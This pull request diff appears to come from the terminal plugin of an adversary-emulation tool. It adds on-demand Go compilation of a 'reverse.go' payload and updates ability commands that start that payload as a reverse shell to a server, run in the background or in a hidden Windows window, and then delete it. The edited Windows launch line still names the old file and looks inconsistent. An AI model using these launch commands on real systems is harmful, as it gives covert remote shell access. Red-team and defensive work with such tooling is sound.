### PR TITLE
Hash changes for reverse.go dynamic compilation

### DIFF
--- a/app/term_svc.py
+++ b/app/term_svc.py
@@ -1,0 +1,28 @@
+import random
+import string
+
+from shutil import which
+
+
+class TermService:
+
+    def __init__(self, file_svc):
+        self.file_svc = file_svc
+
+    async def dynamically_compile(self, headers):
+        name, platform = headers.get('file'), headers.get('platform')
+        if which('go') is not None:
+            plugin, file_path = await self.file_svc.find_file_path(name)
+
+            ldflags = ['-s', '-w', '-X main.key=%s' % (self._generate_key(),)]
+
+            output = 'plugins/%s/payloads/%s-%s' % (plugin, name, platform)
+            self.file_svc.log.debug('Dynamically compiling %s' % name)
+            await self.file_svc.compile_go(platform, output, file_path, ldflags=' '.join(ldflags))
+        return '%s-%s' % (name, platform)
+
+    """ PRIVATE """
+
+    @staticmethod
+    def _generate_key(size=30):
+        return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))

--- a/data/abilities/execution/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+++ b/data/abilities/execution/356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -11,19 +11,19 @@
     darwin:
       sh:
         command: |
-          nohup ./reverse.go-darwin -tcp 127.0.0.1:5678 -http #{server} && sleep 3 >/dev/null 2>&1 &
-        payload: reverse.go-darwin
+          nohup ./reverse.go -tcp 127.0.0.1:5678 -http #{server} && sleep 3 >/dev/null 2>&1 &
+        payload: reverse.go
     linux:
       sh:
         command: |
-          nohup ./reverse.go-linux -tcp 127.0.0.1:5678 -http #{server} && sleep 3 >/dev/null 2>&1 &
-        payload: reverse.go-linux
+          nohup ./reverse.go -tcp 127.0.0.1:5678 -http #{server} && sleep 3 >/dev/null 2>&1 &
+        payload: reverse.go
     windows:
       psh:
         command: |
-          mv reverse.go-windows reverse.go-windows.exe;
+          mv reverse.go reverse.go.exe;
           Start-Process -FilePath .\reverse.go-windows.exe -ArgumentList "-tcp 127.0.0.1:5678 -http #{server}" -WindowStyle hidden;
         cleanup: |
-          rm reverse.go-windows;
-          rm reverse.go-windows.exe;
-        payload: reverse.go-windows
+          rm reverse.go;
+          rm reverse.go.exe;
+        payload: reverse.go

--- a/hook.py
+++ b/hook.py
@@ -3,8 +3,10 @@ import logging
 import random
 
 from pyfiglet import Figlet
+
 from plugins.terminal.app.terminal.shell import Shell
 from plugins.terminal.app.utility.console import Console
+from plugins.terminal.app.term_svc import TermService
 
 name = 'Terminal'
 description = 'A toolset which supports terminal access'
@@ -14,6 +16,8 @@ address = None
 async def initialize(app, services):
     data_svc = services.get('data_svc')
     await data_svc.load_data(directory='plugins/terminal/data')
+    file_svc = services.get('file_svc')
+    await file_svc.add_special_payload('reverse.go', TermService(file_svc).dynamically_compile)
     logging.getLogger().setLevel(logging.FATAL)
     loop = asyncio.get_event_loop()
     show_welcome_msg()


### PR DESCRIPTION
Changes:
* terminal now duplicates logic from sandcat plugin to modify the `key` value when dynamically compiling the reverse.go payload. 
* Update ability definition to reflect how payloads are pulled down now. 


